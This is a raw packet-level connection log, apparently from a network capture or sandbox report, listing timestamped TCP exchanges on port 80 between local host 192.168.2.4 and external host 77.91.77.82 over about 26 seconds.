                                            Jul 2, 2024 08:27:12.975518942 CEST806392077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:12.975584984 CEST6392080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:12.975585938 CEST806391977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:12.975634098 CEST6391980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:12.975804090 CEST6392080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:12.980861902 CEST806392077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:13.691320896 CEST806392077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:13.691406012 CEST6392080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:13.692271948 CEST6392080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:13.697196007 CEST806392077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:13.917201996 CEST806392077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:13.917323112 CEST6392080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:14.032449007 CEST6392080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:14.032777071 CEST6392180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:14.039129019 CEST806392177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:14.039221048 CEST6392180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:14.039319038 CEST6392180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:14.039922953 CEST806392077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:14.039995909 CEST6392080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:14.044670105 CEST806392177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:14.745131016 CEST806392177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:14.745217085 CEST6392180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:14.745840073 CEST6392180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:14.750720024 CEST806392177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:14.969688892 CEST806392177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:14.969830990 CEST6392180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:15.079124928 CEST6392180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:15.079524040 CEST6392280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:15.085030079 CEST806392277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:15.085043907 CEST806392177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:15.085117102 CEST6392180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:15.085139990 CEST6392280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:15.085325956 CEST6392280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:15.091166019 CEST806392277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:16.004910946 CEST806392277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:16.004970074 CEST6392280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:16.005192041 CEST806392277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:16.005234957 CEST6392280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:16.005776882 CEST6392280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:16.010778904 CEST806392277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:16.248869896 CEST806392277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:16.248979092 CEST6392280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:16.360371113 CEST6392280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:16.360687017 CEST6392480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:16.365591049 CEST806392477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:16.365767002 CEST806392277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:16.365788937 CEST6392480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:16.365823984 CEST6392280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:16.366018057 CEST6392480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:16.371721029 CEST806392477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:17.070667982 CEST806392477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:17.070740938 CEST6392480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:17.071520090 CEST6392480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:17.076404095 CEST806392477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:17.291347027 CEST806392477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:17.292433977 CEST6392480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:17.407259941 CEST6392480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:17.407691956 CEST6392580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:17.412563086 CEST806392477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:17.412579060 CEST806392577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:17.412663937 CEST6392480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:17.412715912 CEST6392580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:17.412875891 CEST6392580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:17.418845892 CEST806392577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:18.102931023 CEST806392577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:18.103096962 CEST6392580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:18.103977919 CEST6392580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:18.108839989 CEST806392577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:18.319736004 CEST806392577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:18.319878101 CEST6392580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:18.427000046 CEST6392580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:18.427468061 CEST6392680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:18.432367086 CEST806392677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:18.432465076 CEST6392680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:18.432569981 CEST6392680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:18.433299065 CEST806392577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:18.433382034 CEST6392580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:18.437505007 CEST806392677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:19.131287098 CEST806392677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:19.131628990 CEST6392680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:19.132237911 CEST6392680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:19.136992931 CEST806392677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:19.352888107 CEST806392677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:19.353161097 CEST6392680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:19.454471111 CEST6392680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:19.454857111 CEST6392780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:19.459650040 CEST806392677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:19.459685087 CEST806392777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:19.459770918 CEST6392680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:19.459779024 CEST6392780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:19.459917068 CEST6392780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:19.465068102 CEST806392777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:20.147074938 CEST806392777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:20.147197962 CEST6392780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:20.147958994 CEST6392780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:20.152792931 CEST806392777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:20.364590883 CEST806392777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:20.368429899 CEST6392780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:20.469959021 CEST6392780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:20.470276117 CEST6392880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:20.475059986 CEST806392777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:20.475342035 CEST806392877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:20.475534916 CEST6392780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:20.475565910 CEST6392880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:20.475770950 CEST6392880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:20.480936050 CEST806392877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:21.172013044 CEST806392877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:21.176409960 CEST6392880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:21.177172899 CEST6392880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:21.182657957 CEST806392877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:21.398348093 CEST806392877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:21.398473978 CEST6392880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:21.501519918 CEST6392880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:21.502258062 CEST6392980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:21.506953001 CEST806392877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:21.507010937 CEST6392880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:21.507065058 CEST806392977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:21.507179022 CEST6392980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:21.507508039 CEST6392980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:21.512407064 CEST806392977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:22.193919897 CEST806392977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:22.194061995 CEST6392980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:22.194670916 CEST6392980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:22.199507952 CEST806392977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:22.410031080 CEST806392977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:22.410172939 CEST6392980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:22.516643047 CEST6392980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:22.516967058 CEST6393080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:22.521749973 CEST806393077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:22.521831989 CEST6393080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:22.521938086 CEST6393080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:22.522352934 CEST806392977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:22.522403955 CEST6392980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:22.526796103 CEST806393077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:23.237962008 CEST806393077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:23.238023043 CEST6393080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:23.238913059 CEST6393080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:23.243763924 CEST806393077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:23.464132071 CEST806393077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:23.464240074 CEST6393080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:23.579205036 CEST6393080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:23.579555988 CEST6393180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:23.584383965 CEST806393077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:23.584398985 CEST806393177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:23.584454060 CEST6393080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:23.584495068 CEST6393180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:23.584609985 CEST6393180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:23.589432955 CEST806393177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:24.300184965 CEST806393177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:24.300265074 CEST6393180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:24.300921917 CEST6393180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:24.305859089 CEST806393177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:24.525402069 CEST806393177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:24.525490999 CEST6393180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:24.641765118 CEST6393180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:24.642195940 CEST6393280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:24.647476912 CEST806393277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:24.647723913 CEST6393280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:24.647759914 CEST806393177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:24.647814989 CEST6393180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:24.647836924 CEST6393280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:24.652673960 CEST806393277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:25.339652061 CEST806393277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:25.339755058 CEST6393280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:25.340579033 CEST6393280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:25.347276926 CEST806393277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:25.559257030 CEST806393277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:25.559504986 CEST6393280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:25.674634933 CEST6393280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:25.674920082 CEST6393380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:25.680649042 CEST806393277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:25.680701017 CEST806393377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:25.680763960 CEST6393280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:25.680768967 CEST6393380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:25.680912018 CEST6393380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:25.689805031 CEST806393377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:26.406002045 CEST806393377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:26.406127930 CEST6393380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:26.407082081 CEST6393380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:26.412009001 CEST806393377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:26.635916948 CEST806393377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:26.636080980 CEST6393380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:26.751082897 CEST6393380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:26.751493931 CEST6393480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:26.756340981 CEST806393477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:26.756455898 CEST6393480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:26.756609917 CEST6393480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:26.757016897 CEST806393377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:26.757062912 CEST6393380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:26.765989065 CEST806393477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:27.452573061 CEST806393477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:27.452831030 CEST6393480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:27.454024076 CEST6393480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:27.462865114 CEST806393477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:27.675362110 CEST806393477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:27.675447941 CEST6393480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:27.782629013 CEST6393480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:27.782963991 CEST6393580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:27.787750959 CEST806393577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:27.787837982 CEST6393580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:27.787949085 CEST806393477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:27.788001060 CEST6393480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:27.788130999 CEST6393580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:27.792814970 CEST806393577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:28.590279102 CEST806393577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:28.590405941 CEST6393580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:28.591120005 CEST6393580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:28.595865965 CEST806393577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:28.805778980 CEST806393577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:28.805849075 CEST6393580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:28.907227993 CEST6393580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:28.907661915 CEST6393680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:28.912543058 CEST806393577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:28.912559986 CEST806393677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:28.912642002 CEST6393580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:28.912691116 CEST6393680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:28.912863016 CEST6393680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:28.917639971 CEST806393677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:29.646506071 CEST806393677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:29.646593094 CEST6393680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:29.647347927 CEST6393680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:29.652138948 CEST806393677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:29.876985073 CEST806393677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:29.877146959 CEST6393680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:29.985466003 CEST6393680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:29.985776901 CEST6393780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:29.990514994 CEST806393777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:29.990595102 CEST6393780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:29.990753889 CEST806393677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:29.990802050 CEST6393680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:29.990866899 CEST6393780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:29.995606899 CEST806393777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:30.694075108 CEST806393777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:30.695312977 CEST6393780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:30.696002960 CEST6393780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:30.700772047 CEST806393777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:30.919255018 CEST806393777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:30.919576883 CEST6393780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:31.032447100 CEST6393780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:31.032846928 CEST6393880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:31.037688971 CEST806393777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:31.037713051 CEST806393877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:31.037798882 CEST6393780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:31.037869930 CEST6393880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:31.038101912 CEST6393880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:31.043710947 CEST806393877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:31.744141102 CEST806393877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:31.744306087 CEST6393880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:31.745578051 CEST6393880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:31.750363111 CEST806393877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:31.965464115 CEST806393877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:31.965599060 CEST6393880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:32.081187010 CEST6393880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:32.081506968 CEST6393980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:32.086381912 CEST806393877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:32.086467028 CEST6393880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:32.086488962 CEST806393977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:32.086574078 CEST6393980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:32.086745024 CEST6393980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:32.091495037 CEST806393977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:32.774749994 CEST806393977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:32.774874926 CEST6393980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:32.775573969 CEST6393980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:32.780345917 CEST806393977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:32.991377115 CEST806393977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:32.991499901 CEST6393980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:33.094830990 CEST6393980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:33.095226049 CEST6394080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:33.100048065 CEST806394077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:33.100138903 CEST6394080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:33.100260973 CEST6394080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:33.100370884 CEST806393977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:33.100421906 CEST6393980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:33.104928017 CEST806394077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:33.783843040 CEST806394077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:33.784018040 CEST6394080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:33.784805059 CEST6394080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:33.789622068 CEST806394077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:33.999643087 CEST806394077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:33.999882936 CEST6394080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:34.110429049 CEST6394080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:34.110753059 CEST6394180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:34.115573883 CEST806394177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:34.115641117 CEST806394077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:34.115689993 CEST6394180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:34.115731001 CEST6394080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:34.115863085 CEST6394180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:34.120604992 CEST806394177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:34.819909096 CEST806394177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:34.820036888 CEST6394180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:34.820579052 CEST6394180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:34.825361967 CEST806394177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:35.039117098 CEST806394177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:35.039186954 CEST6394180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:35.157176018 CEST6394180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:35.157497883 CEST6394280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:35.162429094 CEST806394177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:35.162518978 CEST6394180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:35.162575960 CEST806394277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:35.162643909 CEST6394280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:35.162817955 CEST6394280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:35.168591976 CEST806394277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:35.847228050 CEST806394277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:35.847369909 CEST6394280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:35.848095894 CEST6394280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:35.852883101 CEST806394277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:36.061840057 CEST806394277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:36.061970949 CEST6394280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:36.173074007 CEST6394280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:36.173414946 CEST6394380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:36.178268909 CEST806394377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:36.178304911 CEST806394277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:36.178360939 CEST6394380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:36.178400993 CEST6394280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:36.178625107 CEST6394380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:36.188421011 CEST806394377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:36.868891001 CEST806394377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:36.869035006 CEST6394380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:36.869781017 CEST6394380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:36.874589920 CEST806394377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:37.084311962 CEST806394377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:37.084392071 CEST6394380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:37.191710949 CEST6394380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:37.192013025 CEST6394480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:37.198930025 CEST806394477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:37.198945045 CEST806394377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:37.199009895 CEST6394380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:37.199019909 CEST6394480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:37.199198008 CEST6394480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:37.206155062 CEST806394477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:37.885560036 CEST806394477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:37.885788918 CEST6394480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:37.887917042 CEST6394480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:37.892874002 CEST806394477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:38.103653908 CEST806394477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:38.103773117 CEST6394480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:38.220103979 CEST6394480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:38.221016884 CEST6394580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:38.227973938 CEST806394477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:38.228055954 CEST6394480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:38.228081942 CEST806394577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:38.228149891 CEST6394580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:38.228363037 CEST6394580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:38.233105898 CEST806394577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:38.931890965 CEST806394577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:38.931982994 CEST6394580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:38.932794094 CEST6394580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:38.939265966 CEST806394577.91.77.82192.168.2.4
